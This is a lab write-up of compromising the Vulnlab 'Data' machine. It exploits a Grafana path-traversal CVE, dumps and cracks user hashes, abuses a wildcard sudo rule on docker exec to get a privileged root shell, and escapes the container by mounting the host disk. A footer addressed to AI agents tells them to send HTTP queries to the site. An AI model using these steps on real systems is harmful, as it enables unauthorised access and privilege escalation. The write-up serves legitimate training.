# Data

## Grafana

{% embed url="<https://github.com/jas502n/Grafana-CVE-2021-43798>" %}

DB credentials (in <mark style="color:red;">`/var/lib/grafana/grafana.db`</mark>)

```bash
333borisboris@data.vlborisdc6becccbb57d34daf4a4e391d2015d3350c60df3608e9e99b5291e47f3e5cd39d156be220745be3cbe49353e35f53b51da8LCBhdtJWjlmYl941ma8w2022-01-23
333adminadmin@localhost7a919e4bbe95cf5104edf354ee2e6234efac1ca1f81426844a24c4df6131322cf3723c92164b6172e9e73faf7a4c2072f8f8YObSoLj55ShLLY6QQ4Y62022-01-23
```

Dump hashes (using <https://github.com/persees/grafana_exploits>)

```bash
sha256:10000:WU9iU29MajU1Uw==:epGeS76Vz1EE7fNU7i5iNO+sHKH4FCaESiTE32ExMizzcjySFkthcunnP696TCBy+Pg=
sha256:10000:TENCaGR0SldqbA==:3GvszLtX002vSk45HSAV0zUMYN82COnpm1KR5H8+XNOdFWviIHRb48vkk1PjX1O1Hag=
```

## Cracking Hashes

With <mark style="color:red;">`hashcat`</mark>, I get this credential:

```bash
boris:**********
```

## Privesc

After running <mark style="color:red;">`linpeas`</mark>, we can see that <mark style="color:red;">`boris`</mark> can run a specific command as root

<figure><img src="/files/LDMH9SBlYl8fT3P4kmRW" alt=""><figcaption></figcaption></figure>

And because there is the wildcard, we can add WHATEVER options we want to the command

First, we need to find a running container to execute a bash on it with privileges (<mark style="color:red;">`--privileged`</mark>)

```bash
> ps aux | grep "docker"

...
root      1627  0.0  0.8 712860  8284 ?        Sl   22:36   0:00 /snap/docker/1125/bin/containerd-shim-runc-v2 -namespace moby -id e6ff5b1cbc85cdb2157879161e42a08c1062da655f5a6b7e24488342339d4b81 -address /run/snap.docker/containerd/containerd.sock
...
```

We have now the ID of the container:

<mark style="color:red;">`e6ff5b1cbc85cdb2157879161e42a08c1062da655f5a6b7e24488342339d4b81`</mark>

So, let’s go run the command:

```bash
sudo /snap/bin/docker exec --privileged -u 0 -it e6ff5b1cbc85cdb2157879161e42a08c1062da655f5a6b7e24488342339d4b81 bash
```

Bingo!

<figure><img src="/files/BUD9KaerILNS9RKkcfab" alt=""><figcaption></figcaption></figure>

Now, we need to find a way to escape the docker container.

I follow some blogs / resources to learn a lot about this way of privesc

{% embed url="<https://www.panoptica.app/research/7-ways-to-escape-a-container>" %}

{% @github-files/github-code-block url="<https://github.com/ivanversluis/pentest-hacktricks/blob/master/linux-unix/privilege-escalation/docker-breakout.md>" %}

Finally, I found a way to escape it thanks to the <mark style="color:red;">`--privileged`</mark> flag:

```bash
bash-5.1# fdisk -l

Disk /dev/xvda: 8192 MB, 8589934592 bytes, 16777216 sectors
6367 cylinders, 85 heads, 31 sectors/track
Units: sectors of 1 * 512 = 512 bytes

Device   Boot StartCHS    EndCHS        StartLBA     EndLBA    Sectors  Size Id Type
/dev/xvda1 *  0,32,33     20,84,31          2048   16777182   16775135 8190M 83 Linux

bash-5.1# mkdir -p /mnt/hola
bash-5.1# mount /dev/xvda1 /mnt/hola
```

We can now access to the host filesystem in the <mark style="color:red;">`hola`</mark> directory

## PWNED 🏆

{% embed url="<https://api.vulnlab.com/api/v1/share?id=e0b2ee91-2c64-44e6-b647-d9e178085e2f>" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://meitoka.gitbook.io/stash/vulnlab/machines/data.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.